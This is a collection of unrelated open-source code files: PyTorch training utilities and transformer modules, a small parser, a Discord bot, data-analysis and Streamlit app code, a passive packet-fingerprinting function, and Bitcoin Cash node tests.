parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps,
delta=0.1, wd_ratio=0.01, nesterov=True)
elif opt_lower == 'sgdp':
optimizer = SGDP(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay,
eps=args.opt_eps, nesterov=True)
elif opt_lower == 'adadelta':
optimizer = optim.Adadelta(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'rmsprop':
optimizer = optim.RMSprop(
parameters, lr=args.lr, alpha=0.9, eps=args.opt_eps,
momentum=args.momentum, weight_decay=weight_decay)
elif opt_lower == 'rmsproptf':
optimizer = RMSpropTF(
parameters, lr=args.lr, alpha=0.9, eps=args.opt_eps,
momentum=args.momentum, weight_decay=weight_decay)
elif opt_lower == 'novograd':
optimizer = NovoGrad(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'nvnovograd':
optimizer = NvNovoGrad(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedsgd':
optimizer = FusedSGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=True)
elif opt_lower == 'fusedmomentum':
optimizer = FusedSGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=False)
elif opt_lower == 'fusedadam':
optimizer = FusedAdam(
parameters, lr=args.lr, adam_w_mode=False, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedadamw':
optimizer = FusedAdam(
parameters, lr=args.lr, adam_w_mode=True, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusedlamb':
optimizer = FusedLAMB(parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'fusednovograd':
optimizer = FusedNovoGrad(
parameters, lr=args.lr, betas=(0.95, 0.98), weight_decay=weight_decay, eps=args.opt_eps)
else:
assert False and "Invalid optimizer"
raise ValueError
if len(opt_split) > 1:
if opt_split[0] == 'lookahead':
optimizer = Lookahead(optimizer)
return optimizer
```
#### File: 1chimaruGin/EfficientDet/normalize.py
```python
import torch
from data.preprocess import csv_to_dataset
from data.loader import create_custom_loader
dataset = csv_to_dataset(path='data/train.csv')
loader = {x: create_custom_loader(dataset[x], batch_size=32,
num_workers=0) for x in ['train', 'val']}
def get_mean_std(loader):
    # Var[X] = E[X**2] - E[X]**2
channel_sum, channel_square_sum, num_batches = 0, 0, 0
for data, _, _ in loader['val']:
        # data is assumed to come out of the loader in NCHW layout, so the
        # per-channel mean is taken over batch, height and width.
        channel_sum += torch.mean(data, dim=[0, 2, 3])
channel_square_sum += torch.mean(data**2, dim=[0,2,3])
num_batches += 1
mean = channel_sum / num_batches
std = (channel_square_sum / num_batches - mean**2)**0.5
return mean, std
mean, std = get_mean_std(loader)
print(mean, std)
``` |
{
"source": "1chimaruGin/KaMI",
"score": 2
} |
#### File: KaMI/utils/callbacks.py
```python
import re
from utils import camel2snake
class Callback():
_order = 0
def set_runner(self, run):
self.run = run
def __getattr__(self, k):
return getattr(self.run, k)
@property
def name(self):
name = re.sub(r'Callback$', '', self.__class__.__name__)
return camel2snake(name or 'callback')
def __call__(self, cb_name):
f = getattr(self, cb_name, None)
if f and f(): return True
return False
class TrainEvalCallback(Callback):
def fit_start(self):
pass
def fit_end(self):
pass
def epoch_start(self):
pass
def epoch_end(self):
pass
def validate_start(self):
pass
def validate_end(self):
pass
``` |
{
"source": "1chimaruGin/Transformer",
"score": 3
} |
#### File: Transformer/models/transformer.py
```python
import math
import torch
import torch.nn as nn
from .pos_encoding import positional_encoding
from .multihead_attn import MultiHeadAttention
from .utils import clone_module_list
class FeedForward(nn.Module):
def __init__(
self,
d_model: int,
features: int,
dropout: float = 0.1,
activation=nn.ReLU(),
is_gated: bool = False,
bias_1: bool = True,
bias_2: bool = True,
bias_gate: bool = True,
):
super(FeedForward, self).__init__()
self.layer_1 = nn.Linear(d_model, features, bias=bias_1)
self.layer_2 = nn.Linear(features, d_model, bias=bias_2)
self.dropout = nn.Dropout(dropout)
self.activation = activation
self.is_gated = is_gated
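        # In the gated (GLU-style) variants, the activated projection is
        # multiplied elementwise by a separate linear projection of the input.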
if is_gated:
self.linear_v = nn.Linear(d_model, features, bias=bias_gate)
def forward(self, x: torch.Tensor):
g = self.activation(self.layer_1(x))
if self.is_gated:
g = g * self.linear_v(x)
else:
x = g
x = self.dropout(x)
return self.layer_2(x)
class PositionalEmbedding(nn.Module):
def __init__(self, d_model: int, n_vocab: int, max_len: int = 5000):
super(PositionalEmbedding, self).__init__()
self.linear = nn.Embedding(n_vocab, d_model)
self.d_model = d_model
self.register_buffer("pos_encodings", positional_encoding(d_model, max_len))
def forward(self, x: torch.Tensor):
        pe = self.pos_encodings[: x.shape[0]].requires_grad_(False)
return self.linear(x) * math.sqrt(self.d_model) + pe
class LearnedPositionalEmbedding(nn.Module):
def __init__(self, d_model: int, n_vocab: int, max_len: int = 5000):
super(LearnedPositionalEmbedding, self).__init__()
self.linear = nn.Embedding(n_vocab, d_model)
self.d_model = d_model
self.pos_encodings = nn.Parameter(
torch.zeros(max_len, 1, d_model), requires_grad=True
)
def forward(self, x: torch.Tensor):
pe = self.pos_encodings[: x.shape[0]]
return self.linear(x) * math.sqrt(self.d_model) + pe
class TransformerLayer(nn.Module):
def __init__(
self,
d_model: int,
self_attn: MultiHeadAttention,
src_attn: MultiHeadAttention = None,
feed_forward: FeedForward = None,
dropout: float = 0.1,
):
super().__init__()
self.size = d_model
self.self_attn = self_attn
self.src_attn = src_attn
self.feed_forward = feed_forward
self.dropout = nn.Dropout(dropout)
self.norm_self_attn = nn.LayerNorm([d_model])
if self.src_attn is not None:
self.norm_src_attn = nn.LayerNorm([d_model])
self.norm_FFN = nn.LayerNorm([d_model])
self.is_save_FFN_input = False
def forward(
self,
x: torch.Tensor,
mask: torch.Tensor = None,
src: torch.Tensor = None,
src_mask: torch.Tensor = None,
):
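        # Pre-LayerNorm residual block: normalize, attend, apply dropout, then
        # add the result back onto the un-normalized input.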
        z = self.norm_self_attn(x)
self_attn = self.self_attn(q=z, k=z, v=z, mask=mask)
x = x + self.dropout(self_attn)
if src is not None:
z = self.norm_src_attn(x)
attn_src = self.src_attn(q=z, k=src, v=src, mask=src_mask)
x = x + self.dropout(attn_src)
z = self.norm_FFN(x)
if self.is_save_FFN_input:
self.FFN_Input = z.clone()
FFN = self.feed_forward(z)
x = x + self.dropout(FFN)
return x
class Encoder(nn.Module):
def __init__(self, layer: TransformerLayer, n_layers: int):
super(Encoder, self).__init__()
self.layers = clone_module_list(layer, n_layers)
self.norm = nn.LayerNorm(layer.size)
def forward(self, x: torch.Tensor, mask: torch.Tensor):
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
class Decoder(nn.Module):
def __init__(self, layer: TransformerLayer, n_layers: int):
super(Decoder, self).__init__()
self.layers = clone_module_list(layer, n_layers)
self.norm = nn.LayerNorm(layer.size)
def forward(self, x: torch.Tensor, memory: torch.Tensor, src_mask: torch.Tensor, tgt_mask: torch.Tensor):
for layer in self.layers:
x = layer(x, mask=tgt_mask, src=memory, src_mask=src_mask)
return self.norm(x)
``` |
{
"source": "1Chip1/Jyt-Language",
"score": 3
} |
#### File: Jyt-Language/Jyt/parser.py
```python
class Parser:
def __init__(self, tokens):
self.tokens = tokens
self.AST = []
def add_node(self, parent, node):
for a in self.AST:
if parent in a:
a[parent].append(node)
def build_AST(self):
saved = {}
parent = {}
collect = False
        for token in self.tokens:
if token['id'] == 'lable':
t = {token['value']: []}
if parent != t:
parent = token['value']
self.AST.append(t)
elif token['id'] == 'keyword':
if token['value'] == 'end':
t = {token['value']: 0}
self.add_node(parent, t)
else:
if collect == False:
saved = token
collect = True
else:
                        t = {saved['value']: token['value']}
self.add_node(parent, t)
collect = False
elif token['id'] == 'char':
if collect == False:
saved = token
collect = True
else:
t = {saved['value']: token['value']}
self.add_node(parent, t)
collect = False
``` |
{
"source": "1chiSensei/discord-bot",
"score": 3
} |
#### File: 1chiSensei/discord-bot/disco.py
```python
from disco.bot import Bot, Plugin
class SimplePlugin(Plugin):
@Plugin.listen('ChannelCreate')
def on_channel_create(self, event):
event.channel.send_message('Woah, a new channel huh!')
@Plugin.command('ping')
def on_ping_command(self, event):
event.msg.reply('Pong!')
@Plugin.command('echo', '<content:str...>')
def on_echo_command(self, event, content):
event.msg.reply(content)
``` |
{
"source": "1colete/dh_projeto_integrador",
"score": 4
} |
#### File: dh_projeto_integrador/bibliotecas/eda.py
```python
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
def EDA_values(df):
'''
    prints the MIN, MAX and MEDIAN values of every column with more than 23 unique values;
    columns with fewer unique values get a list of those values instead
    df -> dataframe to be analyzed
'''
print("")
counter=0
max_col_name_char = 0
for col_name in df.columns:
if len(col_name) > max_col_name_char:
max_col_name_char = len(col_name)+1
if len(df.columns) < 10:
digits = 0
elif len(df.columns) < 100:
digits = 1
else:
digits = 2
for i in df.columns:
if len(df[i].unique()) < 23:
print(' '*(digits-counter//10), counter, '|', i, ' '*(max_col_name_char - len(i))+'| ',
df[i].unique())
else:
try:
print(' '*(digits-counter//10), counter, '|', i,' '*(max_col_name_char - len(i))+'| '+'Min:', df[i].unique().min(),
'| Max:', df[i].unique().max(), '| Avg:',round(df[i].dropna().unique().mean(),2),
'| Median:',round(np.median(df[i].dropna().unique()),2))
except:
print(' '*(digits-counter//10), counter, '|', i,
' '*(max_col_name_char - len(i))+'| '+'Min:', df[i].unique().min(), '| Max:',
df[i].unique().max())
counter += 1
return None
def EDA_graphs(df, disc_cols , cont_cols, target):
'''
    Plots the relationship between the target variable and the discrete and continuous variables
    df -> dataframe to be analyzed
    cont_cols -> list of continuous columns
    disc_cols -> list of discrete columns
    target -> target column
'''
for col in df.columns:
if col in disc_cols:
fig, ax = plt.subplots (1,2, figsize = (15,6))
            fig.suptitle (f'Variable {col}', fontsize = 20, fontweight = 'bold', y =1)
sns.countplot(x=col, data=df, ax=ax[0], ec='black')
ax[0].grid(axis = 'y')
            ax[0].set_title(f'Data distribution of {col}')
sns.barplot(x=col, y = target, data = df, ax=ax[1], ec='black', ci = None)
ax[1].grid(axis = 'y')
            ax[1].set_title(f'{target} as a function of {col}')
plt.show()
elif col in cont_cols:
fig, ax = plt.subplots (1,2, figsize = (15,6))
            fig.suptitle (f'Variable {col}', fontsize = 20, fontweight = 'bold', y =1)
sns.histplot(x=col, hue=target, data = df, ax=ax[0])
            ax[0].set_title(f'Distribution of {col}')
sns.boxplot(x= target, y = col, data = df, ax=ax[1])
            ax[1].set_title(f'Boxplot of {col} as a function of {target}')
plt.show()
```
#### File: 1colete/dh_projeto_integrador/covid_app.py
```python
import streamlit as st
import joblib
import pickle
import pandas as pd
import numpy as np
import os
# import sklearn
#import sqlite3
#from monitor_for_app import *
# from variables import *
#from datetime import datetime
st.set_page_config(page_title = 'Previsor de COVID-19')
@st.cache
def load_data():
current_path = os.getcwd()
    dados_path = os.path.join(current_path, 'dados', 'cleaned', 'df_preped.pkl')
df = pd.read_pickle(dados_path)
return df
def load_model():
# load_model = joblib.load(open(os.path.join(model),"rb"))
current_path = os.getcwd()
model_path = os.path.join(current_path, 'models/clf_tuned.pkl')
load_model = joblib.load(open(model_path, 'rb'))
return load_model
# load data
# df = load_data()
def main():
    options = ['Home', 'Data', 'Prediction', 'About']
    page_option = st.sidebar.selectbox('Pages', options)
    if page_option == 'Home':
        st.title('COVID-19 Predictor')
        # st.markdown(home_page_text, unsafe_allow_html = True)
    elif page_option == 'Data':
        st.title('More information about the dataset')
        # st.markdown(data_description, unsafe_allow_html = True)
        # with st.expander('Statistics', expanded = False):
        #     st.write('We can see statistics for the numeric columns.')
        #     st.write(df.describe())
        # with st.expander('Target values'):
        #     st.write(f'{round(df.obito.value_counts(normalize = True)*100, 2)[1]} % of the records are deaths.')
        #     st.write(round(df.obito.value_counts(normalize = True)*100, 2))
    elif page_option == 'Prediction':
        st.title('Prediction')
        cardiopatia = st.checkbox('Heart disease')
        diabetes = st.checkbox('Diabetes')
        doenca_neurologica = st.checkbox('Neurological diseases')
        obesidade = st.checkbox('Obesity')
        outros_fatores_de_risco = st.checkbox('Other risk factors')
        idade = st.slider('Age: ', 0, 110, 29)
        cs_sexo = st.selectbox('Sex',
                               ('Male', 'Female'))
        if cs_sexo == 'Male':
            cs_sexo = True
        else:
            cs_sexo = False
selected_options = [cardiopatia, diabetes, doenca_neurologica, obesidade, outros_fatores_de_risco , idade , cs_sexo]
sample_input = np.array(selected_options).reshape(1,-1)
model = load_model()
if st.button('Submit'):
# class prediction
prediction_class = model.predict(sample_input)
            if prediction_class == 1:
                prediction_class = 'HIGH RISK'
            else:
                prediction_class = 'LOW RISK'
            st.success(f"Patient at {prediction_class} of death")
    else:
        st.title('About')
# st.markdown(about_text, unsafe_allow_html = True)
main()
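# Usage sketch (assumption): this is a Streamlit app, so it is meant to be
# launched from the command line rather than imported, e.g.:
#   streamlit run covid_app.py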
``` |
{
"source": "1computerguy/mercury",
"score": 2
} |
#### File: pmercury/utils/packet_proc.py
```python
import sys
from pmercury.protocols.tcp import TCP
from pmercury.protocols.tls import TLS
from pmercury.protocols.dtls import DTLS
from pmercury.protocols.http import HTTP
from pmercury.protocols.dhcp import DHCP
from pmercury.protocols.iquic import IQUIC
from pmercury.protocols.tls_server import TLS_Server
from pmercury.protocols.dtls_server import DTLS_Server
from pmercury.protocols.http_server import HTTP_Server
from pmercury.protocols.tls_certificate import TLS_Certificate
def pkt_proc(ts, data):
buf = data
ip_type = 4
if buf[12] == 0x08 and buf[13] == 0x00: # IPv4
ip_length = 20
ip_offset = 14
protocol = buf[23]
elif buf[12] == 0x86 and buf[13] == 0xdd: # IPv6
ip_type = 6
ip_length = 40
ip_offset = 14
protocol = buf[20]
elif buf[14] == 0x08 and buf[15] == 0x00: # IPv4 (hack for linux cooked capture)
ip_length = 20
ip_offset = 16
protocol = buf[25]
    elif buf[12] == 0x81 and buf[13] == 0x00: # 802.1Q VLAN tag (IPv4 or IPv6 payload)
if buf[16] == 0x08 and buf[17] == 0x00: # IPv4
ip_length = 20
ip_offset = 18
protocol = buf[27]
elif buf[16] == 0x86 and buf[17] == 0xdd: # IPv6
ip_type = 6
ip_length = 40
ip_offset = 18
protocol = buf[24]
else:
return None
else: # currently skip other types
return None
data_len = len(data)
fp_str_ = None
fp_str_2_ = None
prot_offset = 0
if protocol == 6:
prot_offset = ip_offset+ip_length
if prot_offset+20 > data_len:
return None
prot_length = (buf[prot_offset+12] >> 0x04)*4
app_offset = prot_offset + prot_length
if buf[prot_offset+13] & 0x12 == 2:
fp_str_, context_ = TCP.fingerprint(data, prot_offset, app_offset, data_len)
fp_type = 'tcp'
elif data_len - app_offset < 16:
return None
elif buf[app_offset] == 22 and buf[app_offset+1] == 3:
if buf[app_offset+5] == 1 and buf[app_offset+9] == 3:
fp_str_, context_ = TLS.fingerprint(data, app_offset, data_len)
fp_type = 'tls'
elif buf[app_offset+5] == 2 and buf[app_offset+9] == 3:
fp_str_, context_ = TLS_Server.fingerprint(data, app_offset, data_len)
fp_type = 'tls_server'
fp_str_2_, context_2_ = TLS_Certificate.fingerprint(data, app_offset, data_len)
fp_type_2 = 'server_certs'
elif buf[app_offset+5] == 11:
fp_str_, context_ = TLS_Certificate.fingerprint(data, app_offset, data_len)
fp_type = 'server_certs'
elif buf[app_offset+2] == 84:
if (buf[app_offset] == 71 and buf[app_offset+3] == 32):
fp_str_, context_ = HTTP.fingerprint(data, app_offset, data_len)
fp_type = 'http'
elif (buf[app_offset] == 72 and buf[app_offset+5] == 49):
fp_str_, context_ = HTTP_Server.fingerprint(data, app_offset, data_len)
fp_type = 'http_server'
elif protocol == 17:
prot_offset = ip_offset+ip_length
prot_length = 8
app_offset = prot_offset + prot_length
if data_len - app_offset < 16:
return None
elif buf[app_offset] == 22 and buf[app_offset+1] == 254:
if buf[app_offset+13] == 1 and buf[app_offset+25] == 254:
fp_str_, context_ = DTLS.fingerprint(data, app_offset, data_len)
fp_type = 'dtls'
elif buf[app_offset+13] == 2 and buf[app_offset+25] == 254:
fp_str_, context_ = DTLS_Server.fingerprint(data, app_offset, data_len)
fp_type = 'dtls_server'
elif (buf[app_offset+1] == 0xff and buf[app_offset+2] == 0x00 and
buf[app_offset+3] == 0x00 and buf[app_offset+4] == 0x18):
fp_str_, context_ = IQUIC.fingerprint(data, app_offset, data_len)
fp_type = 'iquic'
elif data_len - app_offset < 240:
return None
elif (buf[app_offset+236] == 0x63 and
buf[app_offset+237] == 0x82 and
buf[app_offset+238] == 0x53 and
buf[app_offset+239] == 0x63):
fp_str_, context_ = DHCP.fingerprint(data, app_offset, data_len)
fp_type = 'dhcp'
    if fp_str_ is None:
return None
src_port = int.from_bytes(buf[prot_offset:prot_offset+2], byteorder='big')
dst_port = int.from_bytes(buf[prot_offset+2:prot_offset+4], byteorder='big')
if ip_type == 4:
o_ = prot_offset-8
src_ip = f'{buf[o_]}.{buf[o_+1]}.{buf[o_+2]}.{buf[o_+3]}'
o_ += 4
dst_ip = f'{buf[o_]}.{buf[o_+1]}.{buf[o_+2]}.{buf[o_+3]}'
else:
o_ = prot_offset-32
src_ip = (f'{buf[o_]:02x}{buf[o_+1]:02x}:{buf[o_+2]:02x}{buf[o_+3]:02x}:'
f'{buf[o_+4]:02x}{buf[o_+5]:02x}:{buf[o_+6]:02x}{buf[o_+7]:02x}:'
f'{buf[o_+8]:02x}{buf[o_+9]:02x}:{buf[o_+10]:02x}{buf[o_+11]:02x}:'
f'{buf[o_+12]:02x}{buf[o_+13]:02x}:{buf[o_+14]:02x}{buf[o_+15]:02x}')
o_ += 16
dst_ip = (f'{buf[o_]:02x}{buf[o_+1]:02x}:{buf[o_+2]:02x}{buf[o_+3]:02x}:'
f'{buf[o_+4]:02x}{buf[o_+5]:02x}:{buf[o_+6]:02x}{buf[o_+7]:02x}:'
f'{buf[o_+8]:02x}{buf[o_+9]:02x}:{buf[o_+10]:02x}{buf[o_+11]:02x}:'
f'{buf[o_+12]:02x}{buf[o_+13]:02x}:{buf[o_+14]:02x}{buf[o_+15]:02x}')
flow = {'src_ip':src_ip,
'dst_ip':dst_ip,
'src_port':src_port,
'dst_port':dst_port,
'protocol':protocol,
'event_start':ts,
'fingerprints': {}}
if fp_type != 'server_certs':
flow['fingerprints'][fp_type] = fp_str_
else:
if 'tls' not in flow:
flow['tls'] = {}
flow['tls'][fp_type] = fp_str_
    if context_ is not None and context_ != []:
flow[fp_type] = {}
for x_ in context_:
flow[fp_type][x_['name']] = x_['data']
    if fp_str_2_ is not None:
if fp_type_2 != 'server_certs':
flow['fingerprints'][fp_type_2] = fp_str_2_
else:
if 'tls' not in flow:
flow['tls'] = {}
flow['tls'][fp_type_2] = fp_str_2_
        if context_2_ is not None and context_2_ != []:
flow[fp_type_2] = {}
for x_ in context_2_:
flow[fp_type_2][x_['name']] = x_['data']
return flow
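# Usage sketch (an assumption, not part of pmercury itself): pkt_proc expects a
# timestamp and the raw layer-2 frame bytes, e.g. as yielded by dpkt's pcap
# reader. 'capture.pcap' is a made-up file name.
if __name__ == '__main__':
    import dpkt
    with open('capture.pcap', 'rb') as f:
        for ts_, frame_ in dpkt.pcap.Reader(f):
            flow_ = pkt_proc(ts_, frame_)
            if flow_ is not None:
                print(flow_)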
``` |
{
"source": "1cost/Life-in-a-Building",
"score": 3
} |
#### File: Life-in-a-Building/data/images.py
```python
import time
import urllib.request
import numpy as np
import cv2
# Import functions
from ips import *
# Return the current time
def getCurTime():
t = time.localtime()
s = time.strftime("%d_%b_%y_%H_%M_%S", t)
return s
# Return an image from a given ip address
def getImg(ip):
# Access the image and convert bytes to numpy array
    req = urllib.request.urlopen("http://"+ip+"/axis-cgi/jpg/image.cgi")
arr = np.asarray(bytearray(req.read()), dtype=np.uint8)
img = cv2.imdecode(arr, -1)
return img
# Draw bounding box based on object detection
def draw_bounding_box(img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(class_id)
color = [0,255,0]
cv2.rectangle(img, (x,y), (x_plus_w,y_plus_h), color, 2)
cv2.putText(img, label, (x-10,y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
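
# Usage sketch (assumption): the camera IP below is made up; getImg expects an
# Axis camera that exposes the /axis-cgi/jpg/image.cgi endpoint.
if __name__ == '__main__':
    frame = getImg('192.168.0.90')
    draw_bounding_box(frame, 'person', 0.9, 10, 10, 110, 210)
    cv2.imwrite('frame_' + getCurTime() + '.jpg', frame)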
``` |
{
"source": "1Crazymoney/bitcoin-cash-node",
"score": 2
} |
#### File: test/functional/bchn-rpc-gbtl-bg-cleaner.py
```python
import glob
import os
import threading
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, wait_until
from test_framework import messages, blocktools
class GBTLightBGCleanerTest(BitcoinTestFramework):
""" Functional tests for the getblocktemplatelight background "cleaner" thread that removes data from the
gbt/ directory. We set the timeout to a short time and then observe job data first going to the trash/ folder
and then being removed completely. """
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2 # We need connected nodes for getblocktemplatelight RPC to function (bitcoind node policy)
self._cache_size = 5
self._store_time = 10
args = [
'-gbtcachesize={}'.format(self._cache_size),
'-gbtstoretime={}'.format(self._store_time),
]
self.extra_args = [args] * self.num_nodes
def run_test(self):
# generate just 1 block to leave IBD state (no wallet is required for this test so we use hard-coded key)
self.nodes[0].generatetoaddress(1, self.nodes[0].get_deterministic_priv_key().address)
self.sync_all()
gbtl0 = self.nodes[0].getblocktemplatelight()
gbtl1 = self.nodes[1].getblocktemplatelight()
assert_equal(gbtl0, gbtl1)
# some random tx's from mainnet and testnet. They don't have to be valid on this chain for this test.
txs = [
"01000000016af14fe2b65b3fabe6a8f125de5ded1180aff9c3892138eefc16242f2dadfe2f00000000fd8a0100483045022100d80"
"fa2758e4c1bc2b5b687b59d853c3a97e2b343b9ae1cb2bea0dce0e2cb1ca602200ac71e79dcde5d065ac99160be3376c8a373c016"
"<KEY>"
"056922cc8fa4d14eed39a69287a89c9d630164c23f4f810fa774e3feb6cdfea584147304402203f6a7ab7a5b91b0495ff6be292a5"
"eee74bbf5c7b1cc6de586002ccf4142059a302200cf80778d4f4c078073d840b027a927a11d227bb87cbd043c37989f5cb01861c4"
"14cad532102962feabd55f69c0e8eaceb7df43969dda4aeb575c7a501a4d08be392b2c48f2a2102a0e6e0def65cdb686a85c9a5cc"
"03fc4c524831806f03cc7a18463b5267a5961421030b61fc10e70ca4fcedf95ca8284b545a5a80f255205c1c19e5eebcadbc17365"
"921036d623ebfc46b97eb99a43d3c45df09319c8a6c9ba2b292c1a6a42e460034ed7a2103f54a07c2b5e82cf1e6465d7e37ee5a4b"
"0701b2ccda866430190a8ebbd00f07db55aefeffffff022c1172000000000017a914e78564d75c446f8c00c757a2bd783d30c4f08"
"19a8740e88e02000000001976a91471faafd5016aa8255d61e95cfe3c4f180504051e88ac48a80900",
"0100000002ae54229545be8d2738e245e7ea41d089fa3def0a48e9410b49f39ec43826971d010000006a4730440220204169229eb1"
"7dc49ad83675d693e4012453db9a8d1af6f118278152c709f6be022077081ab76df0356e53c1ba26145a3fb98ca58553a98b1c130a"
"2f6cff4d39767f412103cfbc58232f0761a828ced4ee93e87ce27f26d005dd9c87150aad5e5f07073dcaffffffff4eca0e441d0a27"
"f874f41739382cb80fdf3aac0f7b8316e197dd42e7155590c1010000006a47304402203832a75ccfc2f12474c1d3d2fc22cd72cc92"
"4c1b73995a27a0d07b9c5a745f3a022035d98e1017a4cb02ff1509d17c752047dca2b270b927793f2eb9e30af1ac02d6412103cfbc"
"58232f0761a828ced4ee93e87ce27f26d005dd9c87150aad5e5f07073dcaffffffff0260ea00000000000017a9149eefc3ae114359"
"8a830d66cbc32aa583fa3d987687fb030100000000001976a914bddb57be877bd32264fc40670b87b6fb271813f688ac00000000",
"0100000001993b9740d3e289876cbe6920008a35c4a08b7dc4bd48ff61b198f163af3f354900000000644102a8588b2e1a808ade29"
"4aa76a1e63137099fa087841603a361171f0c1473396f482d8d1a61e2d3ff94280b1125114868647bff822d2a74461c6bbe6ffc06f"
"9d412102abaad90841057ddb1ed929608b536535b0cd8a18ba0a90dba66ba7b1c1f7b4eafeffffff0176942200000000001976a91"
"40a373caf0ab3c2b46cd05625b8d545c295b93d7a88acf3fa1400",
]
node = self.nodes[0]
gbt_dir = os.path.join(os.path.join(node.datadir, 'regtest'), 'gbt')
trash_dir = os.path.join(gbt_dir, 'trash')
def path_for_job(jid): return os.path.join(gbt_dir, jid)
def trash_path_for_job(jid): return os.path.join(trash_dir, jid)
self.log.info("gbt_dir: {}".format(gbt_dir))
self.log.info("trash_dir: {}".format(trash_dir))
gbtl = []
seen_jobs_in_gbt_dir = set()
seen_jobs_in_trash_dir = set()
stop_flag = threading.Event()
def poll_thread():
"""This thread is necessary to scan the gbt_dir and trash_dir and not miss any files.
It is a workaround to very slow gitlab CI (especially on aarch64)."""
nonlocal seen_jobs_in_trash_dir, seen_jobs_in_gbt_dir
while not stop_flag.wait(0.100): # poll every 100ms
trashed_jobs = set(os.path.basename(x) for x in glob.glob(trash_path_for_job("*")))
gbt_dir_jobs = set(os.path.basename(x) for x in glob.glob(path_for_job("*")))
seen_jobs_in_trash_dir |= trashed_jobs
seen_jobs_in_gbt_dir |= gbt_dir_jobs
# start the poller thread -- this is necessary to work around CI bugs brought on by slowness on aarch64
pthr = threading.Thread(target=poll_thread, daemon=True)
pthr.start()
try:
# generate a bunch of unique job_ids
txs_tmp = txs
n_iters = self._cache_size * 3 # intentionally overfill past cache size
assert n_iters
for _ in range(n_iters):
gbtl.append(node.getblocktemplatelight({}, txs_tmp))
txs_tmp += txs
finally:
# Ensure subordinate poller thread is stopped, joined
stop_flag.set()
pthr.join()
assert os.path.isdir(gbt_dir)
assert os.path.isdir(trash_dir)
job_ids = {x['job_id'] for x in gbtl}
assert len(job_ids) == n_iters
# constrain the set now to the jobs we expect just in case there is monkey business
# with the gbt dir or trash dir having gotten extra files above, somehow.
seen_jobs_in_trash_dir &= job_ids
seen_jobs_in_gbt_dir &= job_ids
# Note: due to a possible race condition in the case of this test executing slowly,
# the job_id file may be gone now and moved to trash -- so also check the set `seen_jobs_in_gbt_dir`
assert all(os.path.exists(path_for_job(x)) or x in seen_jobs_in_gbt_dir
for x in job_ids)
trashed_ids = set() | seen_jobs_in_trash_dir
removed_ids = set() | {x for x in seen_jobs_in_trash_dir
if not os.path.exists(path_for_job(x))}
def predicate():
for j in job_ids:
if os.path.exists(trash_path_for_job(j)):
trashed_ids.add(j)
elif not os.path.exists(path_for_job(j)):
removed_ids.add(j)
return job_ids == removed_ids
wait_until(predicate, timeout=self._store_time * 2)
assert_equal(job_ids, removed_ids)
assert_equal(job_ids, trashed_ids)
assert len(trashed_ids) > 0
# grab ids for jobs that are no longer in the in-memory LRU cache -- they should all raise now that their
# job data was deleted from disk.
job_ids = [x['job_id'] for x in gbtl[:-self._cache_size]]
assert job_ids and len(job_ids) == (n_iters - self._cache_size)
# now, test that all the deleted ones are truly gone and raise the proper RPC error
for i, job_id in enumerate(job_ids):
tmpl = gbtl[i]
block = messages.CBlock()
block.nVersion = tmpl["version"]
block.hashPrevBlock = int(tmpl["previousblockhash"], 16)
block.nTime = tmpl["curtime"]
block.nBits = int(tmpl["bits"], 16)
block.nNonce = 0
coinbase_tx = blocktools.create_coinbase(height=int(tmpl["height"]) + 1)
coinbase_tx.vin[0].nSequence = 2 ** 32 - 2
coinbase_tx.rehash()
block.vtx = [coinbase_tx]
assert_raises_rpc_error(-8,
"job_id data not available",
node.submitblocklight,
block.serialize().hex(), job_id)
if __name__ == '__main__':
GBTLightBGCleanerTest().main()
```
#### File: test/functional/bchn-rpc-getblocktemplate-sigops.py
```python
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes_bi
)
from test_framework.cdefs import (
BLOCK_MAXBYTES_MAXSIGCHECKS_RATIO,
DEFAULT_EXCESSIVE_BLOCK_SIZE,
ONE_MEGABYTE
)
class GetBlockTemplateSigopsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [[], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def reinit_node(self, node_id, new_extra_args):
self.stop_node(node_id)
self.start_node(node_id, new_extra_args)
connect_nodes_bi(self.nodes[0], self.nodes[1])
self.sync_all()
# Both getblocktemplate() and getblocktemplatelight() should yield same values for sigop and size limits
def assert_case(self, name, node_id, excessive_size):
self.log.info("Asserting case " + name)
expected_sigops = excessive_size // BLOCK_MAXBYTES_MAXSIGCHECKS_RATIO
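        # Worked example (sketch): assuming BLOCK_MAXBYTES_MAXSIGCHECKS_RATIO
        # is 141 (BCHN's value at the time of writing), an excessive size of
        # 32,000,000 bytes yields 32000000 // 141 == 226950 expected sigops.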
self.log.info("- using getblocktemplate()")
tpl = self.nodes[node_id].getblocktemplate()
assert_equal(tpl['sigoplimit'], expected_sigops)
assert_equal(tpl['sizelimit'], excessive_size)
self.log.info("- using getblocktemplatelight()")
tpl = self.nodes[node_id].getblocktemplatelight()
assert_equal(tpl['sigoplimit'], expected_sigops)
assert_equal(tpl['sizelimit'], excessive_size)
def run_test(self):
# Generate 101 blocks, setup tx and sync nodes
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), "1")
self.sync_all()
# Check against the first node, which runs with default params
self.assert_case("when using DEFAULT_EXCESSIVE_BLOCK_SIZE", 0, DEFAULT_EXCESSIVE_BLOCK_SIZE)
# From now on, we will test on second node with various values for excessiveblocksize
# When below default size
